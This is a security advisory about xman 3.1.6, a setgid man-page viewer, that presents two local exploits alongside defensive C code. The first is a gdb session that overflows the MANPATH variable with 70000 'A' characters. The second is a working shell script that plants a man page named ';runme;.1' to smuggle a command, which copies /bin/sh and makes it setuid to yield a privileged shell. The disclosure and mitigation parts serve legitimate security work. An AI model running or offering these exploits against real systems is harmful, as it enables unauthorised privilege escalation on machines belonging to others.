xman buffer overflow vulnerability


Affected program:
xman

Description:
A local attacker can exploit a buffer overflow in xman to gain system privileges.

Details:
xman has been found to contain a buffer overflow; a local attacker may be able to exploit it to gain system privileges.

The following code is provided only for testing and researching this vulnerability; anyone who uses it for improper purposes bears the consequences themselves.


exploit 1:
[root@linux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman*


[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.


[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault


[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141


(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66


-KF

exploit 2:

-- xxman.sh --


#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest


-- xxman.sh --
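The two exploits above show two distinct defects: an unbounded copy of the attacker-controlled MANPATH value, and a setgid binary that never drops its group privilege before acting on untrusted input. The following C program is an added example written for this page, not xman's source, that models how each should be handled; MANPATH_MAX, the function names and the path "/usr/share/man" are assumptions.

```c
#define _DEFAULT_SOURCE            /* for setregid() on glibc */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define MANPATH_MAX 4096           /* assumed bound; size it for real needs */

/* Bounded copy of an untrusted MANPATH value. Scanning stops at outsz, so a
 * 70000-byte value is rejected instead of overrunning the buffer.
 * Returns 0 on success, -1 if the value is missing or too long. */
int copy_manpath(const char *value, char *out, size_t outsz)
{
    if (value == NULL || outsz == 0) return -1;
    size_t len = 0;
    while (len < outsz && value[len] != '\0')
        len++;
    if (len == outsz) return -1;       /* no room for the terminator */
    memcpy(out, value, len + 1);
    return 0;
}

/* Permanently drop a setgid program's group privilege (the step xman skips).
 * setregid(real, real) also resets the saved gid on Linux, so the privileged
 * group cannot be regained later. Returns 0 on success. */
int drop_group_privilege(void)
{
    gid_t real = getgid();
    if (setregid(real, real) != 0) return -1;
    return getegid() == real ? 0 : -1; /* verify the drop took effect */
}

/* Self-check mirroring the advisory's test: 70000 'A's must be refused, an
 * ordinary path accepted and copied intact. Returns 1 when both hold. */
int manpath_checks_pass(void)
{
    char buf[MANPATH_MAX];
    char *huge = malloc(70001);        /* constructed, like perl -e 'print "A" x 70000' */
    if (huge == NULL) return 0;
    memset(huge, 'A', 70000);
    huge[70000] = '\0';
    int rejected = copy_manpath(huge, buf, sizeof buf) == -1;
    int accepted = copy_manpath("/usr/share/man", buf, sizeof buf) == 0 &&
                   strcmp(buf, "/usr/share/man") == 0;
    free(huge);
    return rejected && accepted;
}

int main(void) { return (drop_group_privilege() == 0 && manpath_checks_pass()) ? 0 : 1; }
```

The man-page file name in exploit 2 should likewise never reach a shell; pass it as a single argv element to execv rather than through a command string.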

Affected systems:
xman 3.1.6

Solution:
None yet

Published: 23 July 2001
Source: cnns